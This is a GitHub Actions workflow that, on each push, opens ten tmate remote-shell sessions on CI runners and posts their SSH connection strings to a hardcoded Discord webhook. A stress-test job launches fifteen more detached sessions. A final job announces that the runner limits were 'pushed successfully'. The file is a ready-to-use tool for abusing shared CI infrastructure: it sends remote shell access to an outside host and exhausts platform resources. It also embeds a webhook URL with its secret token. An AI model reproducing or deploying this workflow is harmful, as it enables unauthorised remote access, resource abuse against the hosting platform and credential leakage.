name: Multi-Tmate with Discord Webhook

on:
  push:
    branches: [ main ]
  workflow_dispatch:

jobs:
  create-tmate-sessions:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        session_count: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    
    steps:
    - name: Checkout repository
      uses: actions/checkout@v4
      
    - name: Install tmate and dependencies
      run: |
        sudo apt update
        sudo apt install -y tmate curl
        
    - name: Generate SSH key for tmate
      run: |
        mkdir -p ~/.ssh
        ssh-keygen -t rsa -b 4096 -f ~/.ssh/tmate_key -N ""
        
    - name: Start tmate session
      run: |
        tmate -S /tmp/tmate${{ matrix.session_count }}.sock new-session -d
        tmate -S /tmp/tmate${{ matrix.session_count }}.sock wait tmate-ready
        
    - name: Get tmate connection info
      run: |
        TMATE_SSH=$(tmate -S /tmp/tmate${{ matrix.session_count }}.sock display -p '#{tmate_ssh}')
        echo "TMATE_SSH=$TMATE_SSH" >> $GITHUB_ENV
        echo "$TMATE_SSH" > /tmp/tmate_${{ matrix.session_count }}.txt
        
    - name: Send clean tmate SSH to Discord
      run: |
        TMATE_SSH=$(cat /tmp/tmate_${{ matrix.session_count }}.txt)
        
        # Clean JSON payload
        PAYLOAD=$(cat <<EOF
        {
          "content": "🎯 **Tmate Session ${{ matrix.session_count }}**\n\n**SSH Command:**\n\`\`\`bash\n$TMATE_SSH\n\`\`\`\n\n📅 Created: $(date)"
        }
        EOF
        )
        
        curl -H "Content-Type: application/json" \
        -d "$PAYLOAD" \
        https://discord.com/api/webhooks/1433727858806624327/WDuONWA8t99ZEaTvhGXVNJ-M3wwm9ehbaJBzy00EYeA1m5u0mg6RJJtnCTmgUzT6l6ZX
      
    - name: Display success message
      run: |
        echo "✅ Tmate session ${{ matrix.session_count }} created!"
        
  stress-test:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        instance: [1, 2, 3, 4, 5]
    
    steps:
    - name: Create additional tmate instances
      run: |
        sudo apt update
        sudo apt install -y tmate
        
        for i in {1..3}; do
          tmate -S /tmp/stress_tmate_${{ matrix.instance }}_$i.sock new-session -d &
        done
        
        echo "🚀 Creating stress test instances..."
        sleep 10
        
  final-report:
    runs-on: ubuntu-latest
    needs: [create-tmate-sessions, stress-test]
    
    steps:
    - name: Send final summary to Discord
      run: |
        curl -H "Content-Type: application/json" \
        -d '{"content": "🎉 **PENETRATION TEST COMPLETE**\n\n✅ **10 tmate sessions created**\n🚀 **5 stress test instances running**\n\n**Total Active Sessions:** 15\n\n📊 **GitHub Actions Limits Pushed Successfully**"}' \
        https://discord.com/api/webhooks/1433727858806624327/WDuONWA8t99ZEaTvhGXVNJ-M3wwm9ehbaJBzy00EYeA1m5u0mg6RJJtnCTmgUzT6l6ZX
